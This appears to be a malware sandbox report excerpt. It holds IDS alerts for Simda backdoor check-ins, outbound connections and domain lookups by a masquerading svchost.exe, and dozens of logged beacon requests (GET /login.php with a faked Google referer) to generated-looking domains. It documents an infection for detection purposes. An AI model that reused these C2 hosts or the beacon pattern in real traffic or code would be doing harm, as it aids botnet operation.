Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:50523 -> 154.212.231.82:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:64177 -> 72.52.179.174:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59149 -> 75.2.71.199:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59139 -> 199.191.50.83:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:63517 -> 23.253.46.64:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59146 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:50524 -> 75.2.71.199:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:63520 -> 154.212.231.82:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:64564 -> 75.2.71.199:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59173 -> 18.208.156.248:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:63481 -> 199.191.50.83:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59178 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:56239 -> 3.94.10.34:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:56235 -> 23.253.46.64:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59181 -> 75.2.71.199:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59143 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:63483 -> 75.2.71.199:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:64560 -> 162.255.119.102:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:64008 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:64584 -> 103.150.10.48:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59145 -> 23.253.46.64:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59159 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.6:53979
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59179 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:64572 -> 91.195.240.19:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:64569 -> 3.94.10.34:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:64561 -> 5.79.71.205:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:56237 -> 208.100.26.245:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:56240 -> 18.208.156.248:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:63519 -> 85.17.31.82:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:63521 -> 208.100.26.245:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:63525 -> 72.52.179.174:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:64580 -> 18.208.156.248:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59155 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:64563 -> 208.100.26.245:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59140 -> 85.17.31.82:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59144 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:64575 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:64570 -> 18.208.156.248:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:50519 -> 85.17.31.82:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:64568 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59150 -> 208.100.26.245:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:64562 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:64578 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:64577 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:64579 -> 3.94.10.34:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:64581 -> 103.150.10.48:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:56238 -> 199.191.50.83:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59157 -> 199.191.50.83:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:56241 -> 154.212.231.82:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:64566 -> 154.212.231.82:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59180 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:64567 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:64565 -> 44.221.84.105:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:64571 -> 199.191.50.83:80
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:58867 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:58899 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:58866 -> 99.83.170.3:443
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:58879 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:63303 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:63299 -> 99.83.170.3:443
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:63490 -> 75.2.71.199:443
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:63440 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:58868 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:63493 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:64574 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:63317 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:64573 -> 75.2.71.199:443
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:63420 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59137 -> 75.2.71.199:443
Source: Network traffic	Suricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:64582 -> 188.114.96.3:443

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\apppatch\svchost.exe	Network Connect: 106.15.232.163 8000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 3.94.10.34 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 64.190.63.136 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 72.52.179.174 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Domain query: lykywid.com
Source: C:\Windows\apppatch\svchost.exe	Domain query: vofycim.com
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 154.85.183.50 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 64.225.91.73 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 5.79.71.205 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 99.83.170.3 443	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 52.34.198.229 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 75.2.71.199 443	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 103.150.10.48 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 23.253.46.64 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 199.191.50.83 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 13.248.169.48 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 103.224.212.210 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 76.223.67.189 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 18.208.156.248 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 199.59.243.227 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 208.100.26.245 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 103.224.182.252 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 91.195.240.19 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Domain query: vofyruc.com
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 85.17.31.82 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Domain query: pumydyg.com
Source: C:\Windows\apppatch\svchost.exe	Domain query: puzytap.com
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 162.255.119.102 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 188.114.97.3 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 44.221.84.105 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 154.212.231.82 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 188.114.96.3 443	Jump to behavior

Queries Google from non browser process on port 80

Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupydeq.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lygynud.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupycag.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galynuh.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qexyhuv.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyxynyx.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyciz.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vofycot.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php?subid1=20241112-0413-1393-8b92-799b17a46fa8 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww25.lyxynyx.com Connection: Keep-Alive Cookie: __tad=1731345193.2353053
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php?sub1=20241112-0413-1304-9c25-d9b9aac71030 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww16.vofycot.com Connection: Keep-Alive Cookie: __tad=1731345193.3163760
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyhyg.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lygyvuj.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyhiz.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Windows\apppatch\svchost.exe	HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
